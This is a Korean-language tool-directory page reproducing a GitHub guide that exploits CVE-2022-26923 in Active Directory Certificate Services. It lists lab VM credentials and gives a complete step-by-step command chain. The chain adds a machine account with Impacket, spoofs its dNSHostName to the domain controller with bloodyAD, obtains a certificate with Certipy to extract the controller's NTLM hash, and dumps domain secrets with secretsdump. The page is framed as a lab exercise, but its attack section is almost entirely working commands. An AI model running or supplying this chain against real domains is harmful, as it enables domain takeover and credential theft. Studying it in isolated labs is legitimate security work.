Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-26923-rayng — CVE-2022-26923 악용 | Kitploit
도구/GitHubGitHub/rayngnpc/cve-2022-26923-rayng
Password CrackingPrivilege EscalationVulnerability AnalysisExploitationPenetration TestingAuthenticationLearning & EducationLabs & Practice
GitHubrayngnpc/cve-2022-26923-rayng

CVE-2022-26923-rayng

CVE-2022-26923 악용

저장소 보기
41년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-26923 익스플로잇: 인증서 권한 상승

개요

CVE-2022-26923은 Active Directory Certificate Services(AD CS)의 취약점으로, 공격자가 인증서 기반 인증을 악용하여 권한을 상승시킬 수 있습니다. 이 가이드는 Impacket과 Certipy를 사용하여 이 취약점을 익스플로잇하는 단계를 설명합니다.


자격 증명 테이블

가상 머신사용자 이름비밀번호
Windows ServerAdministrator!@windowsadmintest101
Windows Servertestuser$Vulnerable139
Kali-Linux VMvagrantvagrant

1단계: 저장소 복제 및 가상 머신 설정

먼저, 필요한 파일이 포함된 저장소를 복제합니다:

root@kitploit:~
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng

가상 머신 설정

저장소에는 각각 가상 머신을 프로비저닝하기 위한 Vagrantfile이 있는 두 개의 폴더가 포함되어 있습니다. 계속 진행하기 전에 호스트 컴퓨터에 Vagrant를 설치해야 합니다.

Vagrant 설치

Windows의 경우

여기에서 Vagrant를 다운로드하여 설치합니다. 또는 PowerShell을 사용하여 설치합니다:

root@kitploit:~
choco install vagrant
Linux의 경우
root@kitploit:~
sudo apt update && sudo apt install vagrant -y

Windows Server 2022 VM

WindowsServer2022 디렉토리로 이동합니다:

root@kitploit:~
cd WindowsServer2022
vagrant up

이 명령은 VirtualBox에 Windows Server 2022 VM을 다운로드하고 설정합니다.

Kali Linux VM

Kali-LinuxVM 디렉토리로 이동합니다:

root@kitploit:~
cd Kali-LinuxVM
vagrant up

2단계: 가상 네트워크 구성

익스플로잇에는 NAT 네트워크가 필요하므로 VirtualBox를 다음과 같이 구성합니다:

Windows의 경우

아래 명령을 실행하기 전에 VBoxManage가 환경 변수에 추가되었는지 확인하세요. 추가되지 않은 경우 전체 경로를 사용하여 명령을 실행하십시오:

NAT 네트워크 추가

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

VBoxManage가 인식되지 않으면 다음을 사용하세요:

root@kitploit:~
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Linux의 경우

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

VirtualBox에서 두 VM을 모두 확인하고 네트워크 어댑터 NatNetwork - NatNet1에 할당되었는지 확인하세요.

다른 이름으로 NAT 네트워크를 생성할 수 있지만, IP 범위는 10.0.2.0/24여야 합니다.


3단계: Hosts 파일 수정

계속 진행하기 전에 Windows Server 2022와 Kali Linux VM이 모두 켜져 있는지 확인하세요.

공격을 시작하기 위해 Kali Linux VM에 접속합니다.

도메인 컨트롤러의 IP를 매핑하도록 /etc/hosts 파일을 업데이트합니다:

root@kitploit:~
sudo nano /etc/hosts

다음 항목을 추가합니다:

root@kitploit:~
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

저장하고 종료합니다.


4단계: 환경 설정

CVE-26923 디렉토리로 이동하여 Python 가상 환경을 활성화합니다:

root@kitploit:~
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate

5단계: 도메인에 컴퓨터 추가

Impacket의 addcomputer 유틸리티를 사용합니다:

root@kitploit:~
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'

6단계: PCTEST1을 도메인 컨트롤러에 할당

방법 1: SSH 사용 (대상 서버에 OpenSSH가 설치된 경우)

root@kitploit:~
ssh [email protected]
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname

방법 2: SSH 없이 (Impacket 및 BloodyAD 사용)

도메인 컴퓨터 확인:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

bloodyAD 디렉토리로 이동하여 bloodyAD.py를 사용하여 PCTEST1을 도메인에 추가합니다:

root@kitploit:~
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'

PCTEST1이 도메인에 할당되었는지 확인합니다:

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

7단계: 익스플로잇 과정

취약한 인증서 찾기

Certipy를 사용하여 취약한 인증서를 찾습니다:

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'

인증서 요청

Certipy를 사용하여 시스템 인증서를 요청합니다:

root@kitploit:~
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA

인증서로 인증

획득한 인증서를 사용하여 인증합니다:

root@kitploit:~
certipy auth -pfx server2022.pfx

8단계: NTLM 해시 추출

certipy auth 명령을 실행하면 두 개의 해시가 표시됩니다. 오른쪽 해시가 NTLM 인증에 사용됩니다.

해시 출력 예시:

root@kitploit:~
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7

추출된 NTLM 해시를 사용하여 자격 증명을 덤프합니다:

root@kitploit:~
impacket-secretsdump '[email protected]' -hashes :69079fd4946af567d682d61e121f29e7

이것으로 CVE-2022-26923 익스플로잇을 위한 전체 공격 체인이 완료됩니다.

도구 다운로드